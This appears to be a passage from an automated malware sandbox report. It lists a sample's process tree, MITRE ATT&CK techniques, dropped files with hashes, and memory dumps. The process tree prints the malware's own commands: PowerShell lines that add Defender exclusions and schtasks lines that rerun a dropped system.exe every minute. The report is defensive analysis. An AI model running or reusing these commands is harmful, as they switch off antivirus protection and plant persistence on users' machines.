C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
PID:2308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
PID:856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
PID:1184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
PID:1480

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"
8⤵
- Creates scheduled task(s)
PID:4180

C:\Users\Admin\AppData\Local\Temp\TBYPAE.exe
"C:\Users\Admin\AppData\Local\Temp\TBYPAE.exe"
3⤵
- Drops startup file
- Adds Run key to start application
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:5032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn OSBLTR.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
4⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn OSBLTR.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
5⤵
- Creates scheduled task(s)
PID:1732

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\OSBLTR.vbs
4⤵
PID:3024

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:1728

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:1520

C:\Users\Admin\system.exe
C:\Users\Admin\system.exe
1⤵
- Executes dropped EXE
PID:3440

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:4216

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:1116

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e577254.rbs

Filesize
621B

MD5
75b33e1c0e6beac192507382961889f0

SHA1
8abcf082e5782d31e692d3ed37642c5c5cf35458

SHA256
6bcc5b87d43f9384c318336cbc8483140f6279d8dc10e63784c3204128a6eae0

SHA512
7e454976003cd03c77fc8d786730ad805d82cc168cb1a6c47604c2459ebabc0834b11a09b2600b31c7dd0e9a30c04f466abde6291393c1e054bb24980f3a8a27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
8ba8fc1034d449222856ea8fa2531e28

SHA1
7570fe1788e57484c5138b6cead052fbc3366f3e

SHA256
2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

SHA512
7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4de6253050496713b76b35d6e6653721

SHA1
66e91350f53d110debb3b3dde3fd9f4a98323f49

SHA256
0818c225b9bc676048a78566b7690a0b213b04fbd4af2ae6e13168474d297997

SHA512
dbcd5279bbfaa93f107f760cdd5c296e27fe2d57fec968d05857aa55e627af26d2e9a0d56e4a006fb931c88a9e7c7e56c767de54aa69dfc08491ab7d523bc5df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
39a6c1d4b6babb81136dd2d2f6b24884

SHA1
376ac2dba03c42a448f53caacc8c89ac19f187c1

SHA256
8b1ba3366d501ebb3276892fd89e64e23a117393a8ce6a35ddd96d3d622694b3

SHA512
7cdd24b8630646173748b6ca56704da33dbddf1aaae1b2ac1c6ad0056c5dc557e72fa34d74e63f273a889e71b3a82ac5e7755c2c8cad67f09abd3c92fed63a34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
8c7514c9f6fb07e2dc8496b3d9a9581a

SHA1
917eb81b8f29bbea8a30f2be6d14b9e2326dee48

SHA256
fde1fdba3ca13557342d073747a5e3aa6ec37fb9268c468f3e9e362560c65379

SHA512
4213e6108dbd2f5bccba3a1313f9276622e78c9da7c12aa90ddb14416786a49ef18dfee5b55cebf62cd055127b10b0ada7d2ebc35bcc9dfe7ee22758e56a803d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6d5d60c30521118bc3bb20425e814869

SHA1
19d412dcdc5f6fbac6005c03eba67e710fc997b2

SHA256
57702cad7b25b25fcf84500f15e9e9a4592dd12459108fbaf76f4a0c556371df

SHA512
5de37081b2f45aa31fd8afc93d3ee09851257a4c20c6c020183699777a57941f921a6949065ec3ea33a1a9875921dc20452bb00b7bfd18816b8131f89c187c7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\OSBLTR.vbs

Filesize
832B

MD5
ca4eaf12d177153470b5821d4af77a5c

SHA1
f675e4cfba6e211e777dd5e9e2b67ad5c28139e0

SHA256
d7b09a6083ccd83233d63076a924d8389a902ad003928b5ca684ffffd9f593b7

SHA512
acd70a9850ec6595bbc6956cfd218fe6ca85e1f1e3799210efd4102d48e12cdc31aee4d7459ad3a43dab5880d8be5eaea2174d6da26d455a4cac5a749e03f759

Download Submit
C:\Users\Admin\AppData\Local\Temp\TBYPAE.exe

Filesize
790KB

MD5
346bf182c60f9b5f09de383e64548d12

SHA1
e8ed60bf0b4f2b996d386d03cf26042f0e4ae92a

SHA256
bb58ac631bb7905c665d82869ba13fc6e1a92f27c89934f3cbb6f4fc057eb7e3

SHA512
55edb9a299edc5dbbd7152e855d990f6c379e56b97fde783ae97f0554f251c602f403e6d8548c351969363b442ce35e3558151acabf9c0801503df9a00fb944a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ucgsyxrd.5cl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\loader (5).bat

Filesize
309KB

MD5
1062132055a7e834b24e3d07a6e4aaa9

SHA1
e237e0bb211e3b9c06dff82b757dcc67d8e3b4b0

SHA256
517881836b87027fc9f923533c0738227c9e986d85a41c332444856719477baf

SHA512
90f33636541c110144b00ccbf80f9812565f80e510547904534ff5b70c1f3eacdcf411ebb2d3bec730c918887a84519b41f7bdfdc5e11dbd2097e9d55517443a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_14.vbs

Filesize
114B

MD5
e378c881965c16a358b1e81b16674e47

SHA1
50ffc0e4f4afb1856d2a16c88af468e2c28237f1

SHA256
0f335590a34069a2c8238deb2eb91ecc8587e5ac3113ec04303bb28ac59eb11b

SHA512
d80ca69041b9984f02da3dbb986dee30ebf476d88f3c625f71f4eff5b93abc31435cf22a58e3cee26094506c5f6c44d6ac1d97f36d2ec506f2dc4253cf1d8878

Download Submit
C:\Users\Admin\system.exe

Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
C:\Windows\Installer\MSI737B.tmp

Filesize
1.1MB

MD5
bf1324998af8532a11a3bb3553396eeb

SHA1
931fb1c2f7b52451cdc7cb3ee43e11b7b14c312a

SHA256
eb57ea0d8c22ca46ae8e3a5036c805ef4d67c82ba5b5af224a495bca46ddbec1

SHA512
7ea2390673d8f9f259fd683bb8cdab8a39a89ec11c3c2bfbd3200ef538ea34b34ee31375af4fdff9d7f8b08c07632119e93d413246d7d035bf23231303650258

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
24.6MB

MD5
dbf15a7928b8f18edbca98aba87049e5

SHA1
9b5ca43741b4eefd3c25fba6fcbc1bf195a0256c

SHA256
64b94997e0ac0c4955648bed7aecad517ab263b25bb719e460b8bf108bd4f0b8

SHA512
bdf56d14d158549c77ecdb574812dbb30f34ceed5597bafba7c0c1671af1fedbe006bd90e39a509d8721311e70d8c0d6531bc5ba912fe16ecacf75caa721ee37

Download Submit
\??\Volume{e9075ed3-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{e85ea7c5-f02c-48aa-a5a4-be6ef0b57855}_OnDiskSnapshotProp

Filesize
6KB

MD5
20ed2ab4c3c8093931e811e0457fbd75

SHA1
fb4cef50030f7a1a2df6bb2fe3a46c42023b8efe

SHA256
bc3b448cc98d7db0ff57ea787ce8f1e1b21e43e1943bd97404145ce9ed00fe37

SHA512
cd87f081374e201e0340f92e5d9cfd5192a621e8a62e9d862ff0ac31a90ea55faa93aa45d8925ceca6c62b35c8b542e44462e9f02886d9d91b299e8ac0b89f88

Download Submit
memory/428-251-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/856-149-0x000000006FF30000-0x000000006FF7C000-memory.dmp

Filesize
304KB

Download
memory/1116-243-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/1116-242-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/1184-168-0x000000006FF30000-0x000000006FF7C000-memory.dmp

Filesize
304KB

Download
memory/1480-187-0x000000006FF30000-0x000000006FF7C000-memory.dmp

Filesize
304KB

Download
memory/1520-216-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/1728-91-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/2148-111-0x0000000007DD0000-0x0000000007DEC000-memory.dmp

Filesize
112KB

Download
memory/2148-203-0x0000000009140000-0x000000000914A000-memory.dmp

Filesize
40KB

Download
memory/2148-202-0x0000000009160000-0x00000000091F2000-memory.dmp

Filesize
584KB

Download
memory/2148-112-0x0000000007E90000-0x0000000007F2C000-memory.dmp

Filesize
624KB

Download
memory/2308-124-0x000000006FF30000-0x000000006FF7C000-memory.dmp

Filesize
304KB

Download
memory/2308-138-0x00000000077D0000-0x00000000077D8000-memory.dmp

Filesize
32KB

Download
memory/2308-137-0x0000000007710000-0x000000000772A000-memory.dmp

Filesize
104KB

Download
memory/2308-136-0x00000000076D0000-0x00000000076E5000-memory.dmp

Filesize
84KB

Download
memory/2308-135-0x00000000076C0000-0x00000000076CE000-memory.dmp

Filesize
56KB

Download
memory/2308-134-0x0000000007690000-0x00000000076A1000-memory.dmp

Filesize
68KB

Download
memory/2308-133-0x0000000007330000-0x00000000073D4000-memory.dmp

Filesize
656KB

Download
memory/3316-48-0x0000000005360000-0x00000000053C6000-memory.dmp

Filesize
408KB

Download
memory/3316-66-0x0000000007FA0000-0x0000000008546000-memory.dmp

Filesize
5.6MB

Download
memory/3316-45-0x0000000005450000-0x0000000005A7A000-memory.dmp

Filesize
6.2MB

Download
memory/3316-46-0x0000000005150000-0x0000000005172000-memory.dmp

Filesize
136KB

Download
memory/3316-62-0x0000000007920000-0x0000000007F9A000-memory.dmp

Filesize
6.5MB

Download
memory/3316-47-0x00000000052F0000-0x0000000005356000-memory.dmp

Filesize
408KB

Download
memory/3316-58-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

Filesize
120KB

Download
memory/3316-57-0x0000000005A80000-0x0000000005DD7000-memory.dmp

Filesize
3.3MB

Download
memory/3316-59-0x0000000005F80000-0x0000000005FCC000-memory.dmp

Filesize
304KB

Download
memory/3316-44-0x0000000002B10000-0x0000000002B46000-memory.dmp

Filesize
216KB

Download
memory/3316-65-0x0000000006F10000-0x0000000006F4C000-memory.dmp

Filesize
240KB

Download
memory/3316-64-0x00000000064F0000-0x00000000064F8000-memory.dmp

Filesize
32KB

Download
memory/3316-63-0x00000000064B0000-0x00000000064CA000-memory.dmp

Filesize
104KB

Download
memory/3344-77-0x000000006FF30000-0x000000006FF7C000-memory.dmp

Filesize
304KB

Download
memory/3344-88-0x0000000006E90000-0x0000000006E9A000-memory.dmp

Filesize
40KB

Download
memory/3344-76-0x0000000006C50000-0x0000000006C84000-memory.dmp

Filesize
208KB

Download
memory/3344-90-0x0000000007030000-0x0000000007041000-memory.dmp

Filesize
68KB

Download
memory/3344-89-0x00000000070A0000-0x0000000007136000-memory.dmp

Filesize
600KB

Download
memory/3344-86-0x0000000006CB0000-0x0000000006CCE000-memory.dmp

Filesize
120KB

Download
memory/3344-87-0x0000000006CD0000-0x0000000006D74000-memory.dmp

Filesize
656KB

Download
memory/4216-234-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4216-233-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-237-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-206-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-239-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-226-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-227-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-228-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-229-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-230-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-231-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-213-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-115-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-235-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-236-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-211-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-255-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-207-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-240-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-205-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-197-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-244-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-245-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-246-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-247-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-248-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-249-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-26-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-252-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-253-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-254-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5032-238-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download